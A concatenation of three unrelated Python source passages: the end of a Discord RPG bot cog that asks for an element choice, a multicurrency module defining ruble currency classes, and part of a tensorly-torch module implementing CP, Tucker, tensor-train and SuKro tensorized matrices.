text = "`w` - <:water:888029916287885332>(water) Огонь >`х0.75`> Вода >`х1.25`> Земля\n`a` - <:air:888029789749919787>(air) Земля >`х0.75`> Воздух >`х1.25`> Огонь\n`f` - <:fire:888029761828425789>(fire) Воздух >`х0.75`> Огонь >`х1.25`> Вода\n`e` - <:earth:888029840945598534>(earth) Вода >`х0.75`> Земля >`х1.25`> Воздух\n\n<:fire:888029761828425789> >`х1.25`> <:water:888029916287885332> >`х1.25`> <:earth:888029840945598534> >`х1.25`> <:air:888029789749919787> >`х1.25`> <:fire:888029761828425789>\n\nУкажите `none` если у предмета нет стихии."
emb = discord.Embed(title = "Элементы:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['fire', 'water', 'air', 'earth', 'none', 'w', 'a', 'f', 'e']:
if msg.content in ['w', 'water']:
el = "w"
elif msg.content in ['a', 'air']:
el = "a"
elif msg.content in ['f', 'fire']:
el = "f"
elif msg.content in ['e', 'earth',]:
el = "e"
elif msg.content in ['none']:
el = None
return el
else:
await ctx.send("Требовалось указать 1 из элементов! (w, a, f, e)")
return False
def setup(bot):
bot.add_cog(rpg(bot))
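# Loading sketch (module path is hypothetical; assumes `bot` is a configured commands.Bot):
# bot.load_extension('cogs.rpg')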
1cb6227a8845c17890e78ff81a5650c9a8aed567 | 9,858 | py | Python | multicurrency/ruble.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | ["MIT"] | 2 | 2021-03-26T18:19:57.000Z | 2021-07-27T01:15:50.000Z
# -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Ruble currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class BelarusianRuble(Currency):
"""Belarusian Ruble currency representation.
Simple usage example:
>>> from multicurrency import BelarusianRuble
>>> belarusian_ruble = BelarusianRuble(
... amount=123456.789)
>>> print(belarusian_ruble)
123 456,79 Br
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'BelarusianRuble':
"""Class creator.
Returns:
BelarusianRuble: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='BYN',
numeric_code='933',
symbol='Br',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='Br',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class RussianRuble(Currency):
"""Russian Ruble currency representation.
Simple usage example:
>>> from multicurrency import RussianRuble
>>> russian_ruble = RussianRuble(
... amount=123456.789)
>>> print(russian_ruble)
123 456,79 ₽
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'RussianRuble':
"""Class creator.
Returns:
RussianRuble: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='RUB',
numeric_code='643',
symbol='₽',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='₽',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class RussianRubleRU(Currency):
"""Russian Ruble RU currency representation.
Simple usage example:
>>> from multicurrency import RussianRubleRU
>>> russian_ruble_ru = RussianRubleRU(
... amount=123456.789)
>>> print(russian_ruble_ru)
123 456,79 ₽
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'RussianRubleRU':
"""Class creator.
Returns:
RussianRubleRU: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='RUB',
numeric_code='643',
symbol='₽',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='RU₽',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class RussianRubleGE(Currency):
"""Russian Ruble GE currency representation.
Simple usage example:
>>> from multicurrency import RussianRubleGE
>>> russian_ruble_ge = RussianRubleGE(
... amount=123456.789)
>>> print(russian_ruble_ge)
123 456,79 ₽
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'RussianRubleGE':
"""Class creator.
Returns:
RussianRubleGE: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='RUB',
numeric_code='643',
symbol='₽',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='GE₽',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
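# Note: RussianRubleRU and RussianRubleGE differ from RussianRuble only in their
# localized_symbol ('RU₽' and 'GE₽' instead of '₽'); alpha/numeric codes and formatting defaults are identical.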
1cb7f57950a9e0e1c1f1d6ce21dddf90764c0bad | 32,326 | py | Python | tltorch/factorized_tensors/tensorized_matrices.py | cassiofragadantas/torch | 0db832121a82eef34cb75f6006825836cae379ac | ["BSD-3-Clause"] | null | null | null
import math
import numpy as np
import torch
from torch import nn
import tensorly as tl
tl.set_backend('pytorch')
from tensorly import tenalg
from tensorly.decomposition import parafac, tucker, tensor_train, tensor_train_matrix
from .core import TensorizedMatrix
from ..utils.parameter_list import FactorList
# Author: Jean Kossaifi
# License: BSD 3 clause
def _ensure_tuple(value):
"""Returns a tuple if `value` isn't one already"""
if isinstance(value, int):
if value == 1:
return ()
else:
return (value, )
elif isinstance(value, tuple):
if value == (1,):
return ()
return tuple(value)
else:
return tuple(value)
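# Illustrative, derived from the branches above:
#   _ensure_tuple(1) == ()        _ensure_tuple(4) == (4,)
#   _ensure_tuple((1,)) == ()     _ensure_tuple([2, 3]) == (2, 3)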
class CPMatrix(TensorizedMatrix, name='CP'):
"""Tensorized Matrix in CP Form
"""
def __init__(self, weights, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=()):
super().__init__()
if rank is None:
_, self.rank = tl.cp_tensor._validate_cp_tensor((weights, factors))
else:
self.rank = rank
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.tensorized_shape = tensorized_row_shape + tensorized_column_shape
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.n_matrices = _ensure_tuple(n_matrices)
self.order = len(factors)
self.weights = weights
self.factors = factors
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
tensor_shape = n_matrices + tensorized_row_shape + tensorized_column_shape
rank = tl.cp_tensor.validate_cp_rank(tensor_shape, rank)
# Register the parameters
weights = nn.Parameter(torch.Tensor(rank))
# Avoid the issues with ParameterList
factors = [nn.Parameter(torch.Tensor(s, rank)) for s in tensor_shape]
return cls(weights, factors, tensorized_row_shape, tensorized_column_shape, rank=rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), init='random', **kwargs):
n_matrices = _ensure_tuple(n_matrices)
rank = tl.cp_tensor.validate_cp_rank(n_matrices + tensorized_row_shape + tensorized_column_shape, rank)
with torch.no_grad():
weights, factors = parafac(tensor, rank, **kwargs)
weights = nn.Parameter(weights)
factors = [nn.Parameter(f) for f in factors]
return cls(weights, factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = matrix.reshape((*n_matrices, *tensorized_row_shape, *tensorized_column_shape))
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices, **kwargs)
def init_from_tensor(self, tensor, **kwargs):
with torch.no_grad():
weights, factors = parafac(tensor, self.rank, **kwargs)
self.weights = nn.Parameter(weights)
self.factors = FactorList([nn.Parameter(f) for f in factors])
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = matrix.reshape((*self.n_matrices, *self.tensorized_row_shape, *self.tensorized_column_shape))
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.weights, self.factors
def to_tensor(self):
return tl.cp_to_tensor(self.decomposition)
def normal_(self, mean=0, std=1):
super().normal_(mean, std)
std_factors = (std/math.sqrt(self.rank))**(1/self.order)
with torch.no_grad():
self.weights.fill_(1)
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def __getitem__(self, indices):
if isinstance(indices, int):
# Select one dimension of one mode
mixing_factor, *factors = self.factors
weights = self.weights*mixing_factor[indices, :]
return self.__class__(weights, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
elif isinstance(indices, slice):
# Index part of a factor
mixing_factor, *factors = self.factors
factors = [mixing_factor[indices], *factors]
weights = self.weights
return self.__class__(weights, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
else:
# Index multiple dimensions
factors = self.factors
index_factors = []
weights = self.weights
for index in indices:
if index is Ellipsis:
raise ValueError(f'Ellipsis is not yet supported, yet got indices={indices} which contains one.')
mixing_factor, *factors = factors
if isinstance(index, int):
if factors or index_factors:
weights = weights*mixing_factor[index, :]
else:
# No factors left
return tl.sum(weights*mixing_factor[index, :])
else:
index_factors.append(mixing_factor[index])
return self.__class__(weights, index_factors+factors, self.shape, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[len(indices):])
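# Usage sketch (shapes and rank are illustrative): tensorize a 12x8 matrix as (3, 4) x (2, 4)
#   fact = CPMatrix.new(tensorized_row_shape=(3, 4), tensorized_column_shape=(2, 4), rank=5)
#   fact.normal_()           # fills the weights with 1 and the factors with scaled Gaussian noise
#   full = fact.to_tensor()  # dense tensor of shape (3, 4, 2, 4); fact.shape == (12, 8)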
class TuckerMatrix(TensorizedMatrix, name='Tucker'):
"""Tensorized Matrix in Tucker Form
"""
def __init__(self, core, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=()):
super().__init__()
if rank is None:
_, self.rank = tl.tucker_tensor._validate_tucker_tensor((core, factors))
else:
self.rank = rank
self.order = self.n_factors = len(factors)
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.n_matrices = _ensure_tuple(n_matrices)
setattr(self, 'core', core)
self.factors = FactorList(factors)
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
full_shape = n_matrices + tensorized_row_shape + tensorized_column_shape
rank = tl.tucker_tensor.validate_tucker_rank(full_shape, rank)
core = nn.Parameter(torch.Tensor(*rank))
factors = [nn.Parameter(torch.Tensor(s, r)) for (s, r) in zip(full_shape, rank)]
return cls(core, factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
rank = tl.tucker_tensor.validate_tucker_rank(n_matrices + tensorized_row_shape + tensorized_column_shape, rank)
with torch.no_grad():
core, factors = tucker(tensor, rank, **kwargs)
return cls(nn.Parameter(core), [nn.Parameter(f) for f in factors], tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = matrix.reshape((*n_matrices, *tensorized_row_shape, *tensorized_column_shape))
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices, **kwargs)
def init_from_tensor(self, tensor, init='svd', **kwargs):
with torch.no_grad():
core, factors = tucker(tensor, self.rank, **kwargs)
self.core = nn.Parameter(core)
self.factors = FactorList([nn.Parameter(f) for f in factors])
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = matrix.reshape((*self.n_matrices, *self.tensorized_row_shape, *self.tensorized_column_shape))
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.core, self.factors
def to_tensor(self):
return tl.tucker_to_tensor(self.decomposition)
def normal_(self, mean=0, std=1):
if mean != 0:
raise ValueError(f'Currently only mean=0 is supported, but got mean={mean}')
r = np.prod([math.sqrt(r) for r in self.rank])
std_factors = (std/r)**(1/(self.order+1))
with torch.no_grad():
self.core.data.normal_(0, std_factors)
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def __getitem__(self, indices):
if isinstance(indices, int):
# Select one dimension of one mode
mixing_factor, *factors = self.factors
core = tenalg.mode_dot(self.core, mixing_factor[indices, :], 0)
return self.__class__(core, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
elif isinstance(indices, slice):
mixing_factor, *factors = self.factors
factors = [mixing_factor[indices], *factors]
return self.__class__(self.core, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
else:
# Index multiple dimensions
modes = []
factors = []
factors_contract = []
for i, (index, factor) in enumerate(zip(indices, self.factors)):
if index is Ellipsis:
raise ValueError(f'Ellipsis is not yet supported, yet got indices={indices}, indices[{i}]={index}.')
if isinstance(index, int):
modes.append(i)
factors_contract.append(factor[index])
else:
factors.append(factor[index])
core = tenalg.multi_mode_dot(self.core, factors_contract, modes=modes)
factors = factors + self.factors[i+1:]
if factors:
return self.__class__(core, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[len(indices):])
# Fully contracted tensor
return core
class TTTensorized(TensorizedMatrix, name='TT'):
"""Tensorized Matrix in Tensor-Train (MPS) Form
Notes
-----
It may be preferable to use TTMatrix instead
See Also
--------
TTMatrix
"""
def __init__(self, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=()):
super().__init__()
if rank is None:
_, self.rank = tl.tt_tensor._validate_tt_tensor(factors)
else:
self.rank = rank
self.order = self.n_factors = len(factors)
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.n_matrices = _ensure_tuple(n_matrices)
self.factors = FactorList(factors)
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
full_shape = n_matrices + tensorized_row_shape + tensorized_column_shape
rank = tl.tt_tensor.validate_tt_rank(full_shape, rank)
# Avoid the issues with ParameterList
factors = [nn.Parameter(torch.Tensor(rank[i], s, rank[i+1])) for i, s in enumerate(full_shape)]
return cls(factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank='same', **kwargs):
full_shape = tensorized_row_shape + tensorized_column_shape
n_matrices = _ensure_tuple(tensor.shape[:-len(full_shape)])
rank = tl.tt_tensor.validate_tt_rank(n_matrices + full_shape, rank)
with torch.no_grad():
factors = tensor_train(tensor, rank, **kwargs)
return cls([nn.Parameter(f) for f in factors], tensorized_row_shape, tensorized_column_shape, rank=rank, n_matrices=n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = matrix.reshape((*n_matrices, *tensorized_row_shape, *tensorized_column_shape))
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, **kwargs)
def init_from_tensor(self, tensor, **kwargs):
with torch.no_grad():
factors = tensor_train(tensor, self.rank, **kwargs)
self.factors = FactorList([nn.Parameter(f) for f in factors])
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = matrix.reshape((*self.n_matrices, *self.tensorized_row_shape, *self.tensorized_column_shape))
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.factors
def to_tensor(self):
return tl.tt_to_tensor(self.decomposition)
def normal_(self, mean=0, std=1):
if mean != 0:
raise ValueError(f'Currently only mean=0 is supported, but got mean={mean}')
r = np.prod(self.rank)
std_factors = (std/r)**(1/self.order)
with torch.no_grad():
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def __getitem__(self, indices):
if isinstance(indices, int):
# Select one dimension of one mode
factor, next_factor, *factors = self.factors
next_factor = tenalg.mode_dot(next_factor, factor[:, indices, :].squeeze(1), 0)
return self.__class__([next_factor, *factors], self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
elif isinstance(indices, slice):
mixing_factor, *factors = self.factors
factors = [mixing_factor[:, indices], *factors]
return self.__class__(factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
else:
factors = []
all_contracted = True
for i, index in enumerate(indices):
if index is Ellipsis:
raise ValueError(f'Ellipsis is not yet supported, yet got indices={indices}, indices[{i}]={index}.')
if isinstance(index, int):
if i:
factor = tenalg.mode_dot(factor, self.factors[i][:, index, :].T, -1)
else:
factor = self.factors[i][:, index, :]
else:
if i:
if all_contracted:
factor = tenalg.mode_dot(self.factors[i][:, index, :], factor, 0)
else:
factors.append(factor)
factor = self.factors[i][:, index, :]
else:
factor = self.factors[i][:, index, :]
all_contracted = False
# We have contracted all cores, so have a 2D matrix
if factor.ndim == 2:
if self.order == (i+1):
# No factors left
return factor.squeeze()
else:
next_factor, *factors = self.factors[i+1:]
factor = tenalg.mode_dot(next_factor, factor, 0)
return self.__class__([factor, *factors], self.tensorized_row_shape,
self.tensorized_column_shape,
n_matrices=self.n_matrices[len(indices):])
else:
return self.__class__([*factors, factor, *self.factors[i+1:]], self.tensorized_row_shape,
self.tensorized_column_shape,
n_matrices=self.n_matrices[len(indices):])
class TTMatrix(TensorizedMatrix, name='TTM'):
"""Tensorized Matrix in the Tensor-Train Matrix (MPO) Form
"""
def __init__(self, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=1):
super().__init__()
if rank is None:
_, self.rank = tl.tt_matrix._validate_tt_matrix(factors)
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.tensorized_shape = tensorized_row_shape + tensorized_column_shape
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.order = len(tensorized_row_shape)
self.factors = FactorList(factors)
self.rank = rank
self.n_matrices = _ensure_tuple(n_matrices)
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
shape = tensorized_row_shape + tensorized_column_shape
rank = tl.tt_matrix.validate_tt_matrix_rank(shape, rank)
if not n_matrices:
factors = [nn.Parameter(torch.Tensor(rank[i], tensorized_row_shape[i], tensorized_column_shape[i], rank[i + 1]))\
for i in range(len(tensorized_row_shape))]
elif len(n_matrices) == 1:
factors = [nn.Parameter(torch.Tensor(n_matrices[0], rank[i], tensorized_row_shape[i], tensorized_column_shape[i], rank[i + 1]))\
for i in range(len(tensorized_row_shape))]
else:
raise ValueError(f'Currently a single dimension is supported for n_matrices, it should an integer (by default, 1) but got n_matrices={n_matrices}.')
return cls(factors, tensorized_row_shape, tensorized_column_shape, rank=rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
rank = tl.tt_matrix.validate_tt_matrix_rank(tensorized_row_shape + tensorized_column_shape, rank)
if n_matrices == ():
with torch.no_grad():
factors = tensor_train_matrix(tensor, rank, **kwargs)
factors = [nn.Parameter(f) for f in factors]
else:
factors = [torch.zeros(n_matrices[0], rank[i], tensorized_row_shape[i], tensorized_column_shape[i], rank[i + 1])\
for i in range(len(tensorized_row_shape))]
for i in range(n_matrices[0]):
with torch.no_grad():
factors_i = tensor_train_matrix(tensor[i], rank, **kwargs)
print(factors_i)
for j, factor in enumerate(factors_i):
factors[j][i, ...] = factor
factors = [nn.Parameter(f) for f in factors]
return cls(factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = matrix.reshape((*n_matrices, *tensorized_row_shape, *tensorized_column_shape))
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices, **kwargs)
def init_from_tensor(self, tensor, **kwargs):
if self.n_matrices == ():
with torch.no_grad():
factors = tensor_train_matrix(tensor, self.rank, **kwargs)
factors = [nn.Parameter(f) for f in factors]
else:
factors = [torch.zeros(self.n_matrices[0], self.rank[i], self.tensorized_row_shape[i], self.tensorized_column_shape[i], self.rank[i + 1])\
for i in range(len(self.tensorized_row_shape))]
for i in range(self.n_matrices[0]):
with torch.no_grad():
factors_i = tensor_train_matrix(tensor[i], self.rank, **kwargs)
print(factors_i)
for j, factor in enumerate(factors_i):
factors[j][i, ...] = factor
factors = [nn.Parameter(f) for f in factors]
self.factors = FactorList(factors)
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = matrix.reshape((*self.n_matrices, *self.tensorized_row_shape, *self.tensorized_column_shape))
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.factors
def to_tensor(self):
if not self.n_matrices:
return tl.tt_matrix_to_tensor(self.decomposition)
else:
ten = tl.tt_matrix_to_tensor(self[0].decomposition)
res = torch.zeros(*self.n_matrices, *ten.shape)
res[0, ...] = ten
for i in range(1, self.n_matrices[0]):
res[i, ...] = tl.tt_matrix_to_tensor(self[i].decomposition)
return res
def normal_(self, mean=0, std=1):
if mean != 0:
raise ValueError(f'Currently only mean=0 is supported, but got mean={mean}')
r = np.prod(self.rank)
std_factors = (std/r)**(1/self.order)
with torch.no_grad():
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def to_matrix(self):
if not self.n_matrices:
return tl.tt_matrix_to_matrix(self.decomposition)
else:
res = torch.zeros(*(self.n_matrices + self.shape))
for i in range(self.n_matrices[0]):
res[i, ...] = tl.tt_matrix_to_matrix(self[i].decomposition)
return res
def __getitem__(self, indices):
if not isinstance(indices, int) or not self.n_matrices:
raise ValueError(f'Currently only indexing over n_matrices is supported for TTMatrices.')
return self.__class__([f[indices, ...] for f in self.factors],
self.tensorized_row_shape, self.tensorized_column_shape, self.rank, self.n_matrices[1:])
def __torch_function__(self, func, types, args=(), kwargs=None):
if kwargs is None:
kwargs = {}
args = [t.to_matrix() if hasattr(t, 'to_matrix') else t for t in args]
return func(*args, **kwargs)
### Auxiliary functions for SuKro factorization
def rearrange(D,n,m,n_matrices=()):
# Input matrix D is of size (n_matrices x prod(n) x prod(m))
# Output tensor R_D is of size (n_matrices x n[0]m[0] x n[1]m[1] x ... x n[-1]m[-1])
assert len(n)==len(m)
#Handle n_matrices
tosqueeze = ()
if n_matrices == ():
D = torch.unsqueeze(D,0)
tosqueeze = True
n_matrices = (1,)
# Main recursion
if len(n)==1: # Base case: vectorizes a given block.
return D.reshape(n_matrices + (-1,))
else:
# Block sizes
n_rows = np.prod(n[1:])
n_cols = np.prod(m[1:])
# Go over each block of the matrix. Then recursively go over all sub-blocks in the block.
for i1 in range(n[0]):
for j1 in range(m[0]):
# Reorders the block and concatenates the results
res = rearrange(D[:,i1*n_rows:(i1+1)*n_rows, j1*n_cols:(j1+1)*n_cols], n[1:], m[1:], n_matrices)
res = torch.unsqueeze(res,1)
R_D = tl.concatenate((R_D,res), axis=1) if (i1,j1) != (0,0) else res
return torch.squeeze(R_D,0) if tosqueeze else R_D
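# e.g. with n=(2, 3), m=(4, 5): D of shape (6, 20) (= prod(n) x prod(m)) is rearranged
# into R_D of shape (8, 15) (= n[0]*m[0] x n[1]*m[1]).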
def rearrange_inv(R_D,n,m,n_matrices=()):
# Input tensor R_D is of size (n_matrices x n[0]m[0] x n[1]m[1] x ... x n[-1]m[-1])
# Output matrix D is of size (n_matrices x prod(n) x prod(m))
assert len(n)==len(m)
#Handle n_matrices
tosqueeze = ()
if n_matrices == ():
R_D = torch.unsqueeze(R_D,0)
tosqueeze = True
n_matrices = (1,)
# Main recursion
if len(n)==1: # Base case: unvectorizes a given block.
return R_D.reshape(n_matrices+n+m)
else:
# Go over each block of the tensor. Then recursively go over all fibers in the slice.
for i1 in range(n[0]):
for j1 in range(m[0]):
# Reorders the block and concatenates the results
res = rearrange_inv(R_D[:,i1*m[0] + j1], n[1:], m[1:], n_matrices)
D_i = tl.concatenate((D_i, res), axis=2) if j1 != 0 else res
D = tl.concatenate((D,D_i), axis=1) if i1 != 0 else D_i
return torch.squeeze(D,0) if tosqueeze else D
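# rearrange_inv is intended as the inverse of rearrange: rearrange_inv(rearrange(D, n, m), n, m) recovers D.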
class SuKroMatrix(TensorizedMatrix, name='SuKro'):
"""Tensorized Matrix in SuKro (sum of Kroneckers) Form.
Matrix is tensorized with a particular entries rearrangement. Then CP factorization is applied.
"""
def __init__(self, weights, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=()):
super().__init__()
if rank is None:
_, self.rank = tl.cp_tensor._validate_cp_tensor((weights, factors))
else:
self.rank = rank
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.tensorized_shape = tensorized_row_shape + tensorized_column_shape
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.n_matrices = _ensure_tuple(n_matrices)
self.order = len(factors)
self.weights = weights
self.factors = factors
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
# Shape of the rearrange tensor is (n[0]m[0]x...x n[-1]m[-1]) not (n[0]x...x n[-1] x m[0]x...x m[-1])
